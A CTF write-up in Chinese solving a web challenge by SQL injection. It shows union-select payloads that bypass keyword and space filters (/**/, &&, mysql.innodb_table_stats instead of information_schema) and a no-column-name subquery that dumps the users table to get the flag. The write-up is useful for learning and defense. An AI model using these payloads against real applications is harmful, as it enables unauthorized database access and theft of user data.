1.登录页面
进来首先是个登录页面,一开始尝试用admin登录并用暴力破解得出密码,但是好像破解不出密码。
看到下面有个注册页面,点开注册一个账号就可以登录了。登录后,点开广告申请,发现有点不对劲。一开始看到文本框,想到了xss,试过几个xss payload,发现应该和xss无关。。。想到sql注入,但不知道怎么构造绕过的payload。看了网上大佬的WP,学到了sql注入的新姿势,原来这是利用了无列名注入。
2.构造payload
随便试了几个payload,发现order,and,or都被过滤了。空格也被过滤了。。。但是空格可以用/**/代替。and也可以用&&代替。那么先试试有几个字段。由于order被过滤了,没法用order by子句判断目标表的列数了。这里我就逐渐增加字段数,这样慢慢的发现竟然有22个字段,并且第2,3列是显示列
-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1
接下来就是老套路,查表,查列,查数据了。
首先爆数据库名,数据库名为web1
-1'/**/union/**/select/**/1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1
接下来爆表名
-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1
但是information被过滤了,实际上是or被过滤了,导致order,or,information这些字都被过滤了。那怎么查到表名?在网上搜索才知道mysql在5.7版本之后还有一个sys系统表sys.schema_auto_increment_columns,作用和information_schema是相似的。
-1'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns /**/where/**/table_schema=database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='
但是试了一下报错,页面说sys.schema_auto_increment_columns这个表不存在。但是根据刚才试列数是页面报的错才知道mysql.innodb_table_stats这个表也可以用,也类似于information_schema,这是这个表的详细使用信息:
https://mariadb.com/kb/en/mysqlinnodb_table_stats/
那么重新构造payload:
-1'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='
查到有两个表ads,users。ads应该是和广告有关的,这里先试试users表
-1'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1
这里用到了子查询,子查询是将一个查询语句放在另一个查询语句中,在特定的情况下,一个查询语句的条件需要另一个查询语句来获取,内层查询语句的查询结果,为外层查询语句提供查询条件。
得到flag,提交